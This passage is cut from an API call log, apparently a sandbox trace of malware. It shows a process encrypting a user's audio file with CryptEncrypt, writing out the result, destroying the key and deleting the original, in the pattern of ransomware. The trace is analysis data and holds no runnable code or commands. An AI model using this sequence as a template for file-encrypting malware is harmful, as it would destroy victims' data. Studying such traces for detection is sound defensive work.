(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0116.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0116.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0116.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0116.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0116.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0116.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0116.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0116.885] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0288 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0116.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0116.886] CharLowerBuffW (in: lpsz="byte[28817]", cchLength=0xb | out: lpsz="byte[28817]") returned 0xb [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7091) returned 0x452b1d8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0116.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x4532278 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x4539310 [0116.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0116.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb2b8 [0116.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.887] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452b1d8*, pdwDataLen=0x144e088*=0x708a, dwBufLen=0x7090 | out: pbData=0x452b1d8*, pdwDataLen=0x144e088*=0x7090) returned 1 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0116.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0116.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0116.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0116.888] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.888] WriteFile (in: hFile=0x258, lpBuffer=0x451d0a8*, nNumberOfBytesToWrite=0x7090, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x451d0a8*, lpNumberOfBytesWritten=0x144ea8c*=0x7090, lpOverlapped=0x0) returned 1 [0116.889] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0116.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0116.890] CryptDestroyKey (hKey=0x41ac780) returned 1 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0116.890] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.890] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.890] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.890] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0116.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0116.891] CryptReleaseContext (hProv=0x41a4948, dwFlags=0x0) returned 1 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.891] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.891] FreeLibrary (hLibModule=0x756e0000) returned 1 [0116.891] CloseHandle (hObject=0x298) returned 1 [0116.891] CloseHandle (hObject=0x258) returned 1 [0116.893] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3", lpFilePart=0x0) returned 0x4e [0116.893] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\mzzhzq983sylb.mp3")) returned 0x20 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0116.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.893] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec66c2c0, ftCreationTime.dwHighDateTime=0x1d5ec1a, ftLastAccessTime.dwLowDateTime=0x880af980, ftLastAccessTime.dwHighDateTime=0x1d5e79d, ftLastWriteTime.dwLowDateTime=0x880af980, ftLastWriteTime.dwHighDateTime=0x1d5e79d, nFileSizeHigh=0x0, nFileSizeLow=0x708a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mzZHZq983SYlb.mp3", cAlternateFileName="MZZHZQ~1.MP3")) returned 0x41ac600 [0116.893] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\mzzhzq983sylb.mp3")) returned 1 [0117.077] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec66c2c0, ftCreationTime.dwHighDateTime=0x1d5ec1a, ftLastAccessTime.dwLowDateTime=0x880af980, ftLastAccessTime.dwHighDateTime=0x1d5e79d, ftLastWriteTime.dwLowDateTime=0x880af980, ftLastWriteTime.dwHighDateTime=0x1d5e79d, nFileSizeHigh=0x0, nFileSizeLow=0x708a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mzZHZq983SYlb.mp3", cAlternateFileName="MZZHZQ~1.MP3")) returned 0 [0117.077] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4590 | out: hHeap=0x1780000) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7518 | out: hHeap=0x1780000) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0117.078] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0117.078] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.078] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.078] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0117.078] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0117.078] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0117.078] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a49d0 [0117.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 